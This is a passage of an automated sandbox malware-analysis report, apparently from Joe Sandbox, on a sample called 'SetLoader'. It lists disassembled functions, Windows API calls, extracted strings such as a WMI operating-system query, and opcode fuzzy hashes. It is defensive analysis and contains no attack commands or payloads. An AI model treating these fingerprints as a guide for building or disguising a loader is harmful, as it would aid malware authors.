                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc58210e336c61a9d84310c97247cbdfbf7f37005146880f929e50597e46bd02
                                              • Instruction ID: 6ad52dfd09bbf0d114f0305ece813a072d3b347c7a719ec3444572d83ab8c654
                                              • Opcode Fuzzy Hash: bc58210e336c61a9d84310c97247cbdfbf7f37005146880f929e50597e46bd02
                                              • Instruction Fuzzy Hash: F951E23150C7E64EC711DF3895504AEBFE29EAB314F0A499DE4D94F242D231AA8ACF52
                                              Function 00622125 Relevance: .1, Instructions: 148COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e19129c9880f5c7b42afde99e85688049f23b2bc4a126f5b486ccba3698fed8f
                                              • Instruction ID: ca452212d6ac327ea74f72d5a5f3c246e718dd6371bd4f5a40e582c8bcfdb882
                                              • Opcode Fuzzy Hash: e19129c9880f5c7b42afde99e85688049f23b2bc4a126f5b486ccba3698fed8f
                                              • Instruction Fuzzy Hash: 8E51CEB1A087119FC748CF29D88055AF7E1BF88314F058A2EF899E7740DB30E955CB9A
                                              Function 00625E86 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                              • Instruction ID: eb41902408db10bfb5767cd37dfb00cbf9a23aaa5e09f827d495c82ce8229844
                                              • Opcode Fuzzy Hash: a36805445e229c2b90d29c9fa108318b87a70c956e41b8f0a663b46aa5c9b3d3
                                              • Instruction Fuzzy Hash: 3631EEB1614B268FCB24EF28C8512AEBBD2EB95310F14492DF496C7342C734E949CF96
                                              Function 00620244 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                              • _swprintf.LIBCMT ref: 00620284
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                                • Part of subcall function 00623F47: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,006202A0,?,00000000,00000000,?,?,?,006202A0,?,?,00000050), ref: 00623F64
                                              • _strlen.LIBCMT ref: 006202A5
                                              • SetDlgItemTextW.USER32(?,00652274,?), ref: 006202FE
                                              • GetWindowRect.USER32(?,?), ref: 00620334
                                              • GetClientRect.USER32(?,?), ref: 00620340
                                              • GetWindowLongW.USER32(?,000000F0), ref: 006203EB
                                              • GetWindowRect.USER32(?,?), ref: 0062041B
                                              • SetWindowTextW.USER32(?,?), ref: 0062044A
                                              • GetSystemMetrics.USER32(00000008), ref: 00620452
                                              • GetWindow.USER32(?,00000005), ref: 0062045D
                                              • GetWindowRect.USER32(00000000,?), ref: 0062048D
                                              • GetWindow.USER32(00000000,00000002), ref: 006204FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                              • String ID: $%s:$CAPTION$d$t"e
                                              • API String ID: 2407758923-2164488584
                                              • Opcode ID: b6be0199a911d60df29bf25600a41befa79dfed851db467771c8745e5ffa21f7
                                              • Instruction ID: 24710fa31f022407f86cd55dcbde4076c002e2139fe4d54549a6c58b4efffd90
                                              • Opcode Fuzzy Hash: b6be0199a911d60df29bf25600a41befa79dfed851db467771c8745e5ffa21f7
                                              • Instruction Fuzzy Hash: 5C81AE72508301AFD714DF68DE89A6FBBEAEB88704F04192DF985D3251D734E948CB52
                                              Function 0063F172 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 0063F1B6
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063ED6E
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063ED80
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063ED92
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDA4
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDB6
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDC8
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDDA
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDEC
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EDFE
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE10
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE22
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE34
                                                • Part of subcall function 0063ED51: _free.LIBCMT ref: 0063EE46
                                              • _free.LIBCMT ref: 0063F1AB
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063F1CD
                                              • _free.LIBCMT ref: 0063F1E2
                                              • _free.LIBCMT ref: 0063F1ED
                                              • _free.LIBCMT ref: 0063F20F
                                              • _free.LIBCMT ref: 0063F222
                                              • _free.LIBCMT ref: 0063F230
                                              • _free.LIBCMT ref: 0063F23B
                                              • _free.LIBCMT ref: 0063F273
                                              • _free.LIBCMT ref: 0063F27A
                                              • _free.LIBCMT ref: 0063F297
                                              • _free.LIBCMT ref: 0063F2AF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID: h)e
                                              • API String ID: 161543041-3223013814
                                              • Opcode ID: d26d7b4c7c0adedc733d47cdd517634f85f7cea3dca1d1154a391df125744c32
                                              • Instruction ID: 8a5f647c11504115317f6373f83bd75f1a7f2405debf94811ef243f01f139c40
                                              • Opcode Fuzzy Hash: d26d7b4c7c0adedc733d47cdd517634f85f7cea3dca1d1154a391df125744c32
                                              • Instruction Fuzzy Hash: 5C315931A00601DFEBA0AB79DC45BD6B3EAFF00710F205529E54AD7291DF71AD408BA4
                                              Function 0062B631 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 0062B656
                                              • _wcslen.LIBCMT ref: 0062B6F6
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0062B705
                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0062B726
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                              • String ID: FjuKc$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                              • API String ID: 1116704506-1915944190
                                              • Opcode ID: 92c347ccc3fac90477e3a762a8627e93b1eb5f25fa3e9ebacafa23be9a5741cb
                                              • Instruction ID: 4f1cb3a71cd56bf20931a6123b1f2961a1460e377ab6b2611390a663e146c0c2
                                              • Opcode Fuzzy Hash: 92c347ccc3fac90477e3a762a8627e93b1eb5f25fa3e9ebacafa23be9a5741cb
                                              • Instruction Fuzzy Hash: F43128321087217FE725AB34EC06FAF779EDF92310F14151EF401962C2FBA499458BAA
                                              Function 0063B8B1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 0063B8C5
                                                • Part of subcall function 0063BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?), ref: 0063BB10
                                                • Part of subcall function 0063BAFA: GetLastError.KERNEL32(?,?,0063EEE6,?,00000000,?,00000000,?,0063EF0D,?,00000007,?,?,0063F30A,?,?), ref: 0063BB22
                                              • _free.LIBCMT ref: 0063B8D1
                                              • _free.LIBCMT ref: 0063B8DC
                                              • _free.LIBCMT ref: 0063B8E7
                                              • _free.LIBCMT ref: 0063B8F2
                                              • _free.LIBCMT ref: 0063B8FD
                                              • _free.LIBCMT ref: 0063B908
                                              • _free.LIBCMT ref: 0063B913
                                              • _free.LIBCMT ref: 0063B91E
                                              • _free.LIBCMT ref: 0063B92C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ea74c479f3fef12b9eb935bd9d856e5eb435b6a97195728ac563c465747e375a
                                              • Instruction ID: 6b0896b8e87591b9aefcfb3bf6695648c31d6b6c3b8b0485a6dbd766174b2c7a
                                              • Opcode Fuzzy Hash: ea74c479f3fef12b9eb935bd9d856e5eb435b6a97195728ac563c465747e375a
                                              • Instruction Fuzzy Hash: 6911A47A500548AFCB41EF59CD92CD93BBAEF04750F0190A9FA098B222DB71EA51DBD4
                                              Function 00635451 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 322700389-393685449
                                              • Opcode ID: cf7b49b86435d14105b3b02a01bc218001162991cd01f76402ee75f5c43b1fc1
                                              • Instruction ID: 4b445d5352b660713e369ca00b0954adfdd2f22eec0078e83e2f43d87be2949d
                                              • Opcode Fuzzy Hash: cf7b49b86435d14105b3b02a01bc218001162991cd01f76402ee75f5c43b1fc1
                                              • Instruction Fuzzy Hash: BDB14771800A09EFCF29DFA4C8819AEBBB6FF14310F14455AE8166B212D731EA61CFD5
                                              Function 0061CE64 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 202COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ClearH_prolog3Variant
                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$fc
                                              • API String ID: 3629354427-1430094071
                                              • Opcode ID: 73ef7c127c10c04490dd56b8a215f0502f60f9db54d46af18347c8ae75510b0e
                                              • Instruction ID: ffa0884adcd11383ade9a576fa73c0f189266f5a50bbd597d7b3649204147770
                                              • Opcode Fuzzy Hash: 73ef7c127c10c04490dd56b8a215f0502f60f9db54d46af18347c8ae75510b0e
                                              • Instruction Fuzzy Hash: 6A714D74A40219AFDB14DFA4CC94DAFB7BAFF49720B18016DF506A72A0CB74AD42CB51
                                              Function 00641CDD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00642452,00000000,00000000,00000000,00000000,00000000,?), ref: 00641D1F
                                              • __fassign.LIBCMT ref: 00641D9A
                                              • __fassign.LIBCMT ref: 00641DB5
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00641DDB
                                              • WriteFile.KERNEL32(?,00000000,00000000,R$d,00000000,?,?,?,?,?,?,?,?,?,00642452,00000000), ref: 00641DFA
                                              • WriteFile.KERNEL32(?,00000000,00000001,R$d,00000000,?,?,?,?,?,?,?,?,?,00642452,00000000), ref: 00641E33
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID: R$d
                                              • API String ID: 1324828854-726558507
                                              • Opcode ID: 32bdba11bdda2bda9d21adac012a68fc435401faa5d18ec22ff7cb7383cbe0fc
                                              • Instruction ID: a88f638868128de80bdf975558b4af3149f61edcf9504e6e14c3f3e759e05b50
                                              • Opcode Fuzzy Hash: 32bdba11bdda2bda9d21adac012a68fc435401faa5d18ec22ff7cb7383cbe0fc
                                              • Instruction Fuzzy Hash: D4518375A002499FDB14CFA8D845AEEBBFAFF0A300F14455AE965EB252D730D981CB60
                                              Function 0061BF89 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061BFA3
                                                • Part of subcall function 006234D7: GetSystemTime.KERNEL32(?,00000000), ref: 006234EF
                                                • Part of subcall function 006234D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 006234FD
                                                • Part of subcall function 00623480: __aulldiv.LIBCMT ref: 00623489
                                              • __aulldiv.LIBCMT ref: 0061BFCF
                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 0061BFD6
                                              • _swprintf.LIBCMT ref: 0061C001
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • _wcslen.LIBCMT ref: 0061C00B
                                              • _swprintf.LIBCMT ref: 0061C061
                                              • _wcslen.LIBCMT ref: 0061C06B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                              • String ID: %u.%03u
                                              • API String ID: 2956649372-1114938957
                                              • Opcode ID: 8ef5e5e686d0f9e190751fc52cd4c219a2deb219ea9115228009fe7c48846f89
                                              • Instruction ID: 6f4238df530710864663439701c2d48fab117647542d5ca331c3215479143906
                                              • Opcode Fuzzy Hash: 8ef5e5e686d0f9e190751fc52cd4c219a2deb219ea9115228009fe7c48846f89
                                              • Instruction Fuzzy Hash: 37218272A04340AFC754EF64CC45EAF77DEEB89750F44491DF448D3242DA35D9488796
                                              Function 0062F9EE Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindow.USER32(?,00000005), ref: 0062FA20
                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0062FA4C
                                                • Part of subcall function 00624168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0061E084,00000000,.exe,?,?,00000800,?,?,?,0062AD5D), ref: 0062417E
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0062FA68
                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0062FA7F
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0062FA93
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0062FABC
                                              • GetWindow.USER32(00000000,00000002), ref: 0062FACC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$MessageSend$ClassCompareLongNameObjectString
                                              • String ID: STATIC
                                              • API String ID: 2673288236-1882779555
                                              • Opcode ID: 0cb28d1c67d81ad1d9091dda71a198569d073d1727bb7abcd70076edc6049dad
                                              • Instruction ID: b0470b2853397878a462838573e6f81078811086912d5686ddd6de64f5653f04
                                              • Opcode Fuzzy Hash: 0cb28d1c67d81ad1d9091dda71a198569d073d1727bb7abcd70076edc6049dad
                                              • Instruction Fuzzy Hash: D3213D72544B20BBE320AB30AC46FEF37AEAF48710F040439F949A6191DB74D9414FE9
                                              Function 0062CBC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CBEE
                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0062CC05
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0062CC19
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CC2A
                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0062CC42
                                              • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0062CC66
                                              • _swprintf.LIBCMT ref: 0062CC85
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                              • String ID: %s %s
                                              • API String ID: 385609497-2939940506
                                              • Opcode ID: 1d19cb510c9ee8456bc23a46fb4af6fda9f60839b0903dab24a6aabaef668083
                                              • Instruction ID: 82fb05ececbaa0de9b8b8694fee1b0fcc8b9579c3b7cb5ef61314802b34fd80b
                                              • Opcode Fuzzy Hash: 1d19cb510c9ee8456bc23a46fb4af6fda9f60839b0903dab24a6aabaef668083
                                              • Instruction Fuzzy Hash: 74214CB690024CABDB20DFA4DD44EEF77BDEF0A304F00456AFA09D7112E6309A05CB61
                                              Function 00632360 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0061CEA9,0061CEAB,00000000,00000000,5CB4B331,00000001,00000000,00000000,?,0061CD87,?,00000004,0061CEA9,ROOT\CIMV2), ref: 006323E9
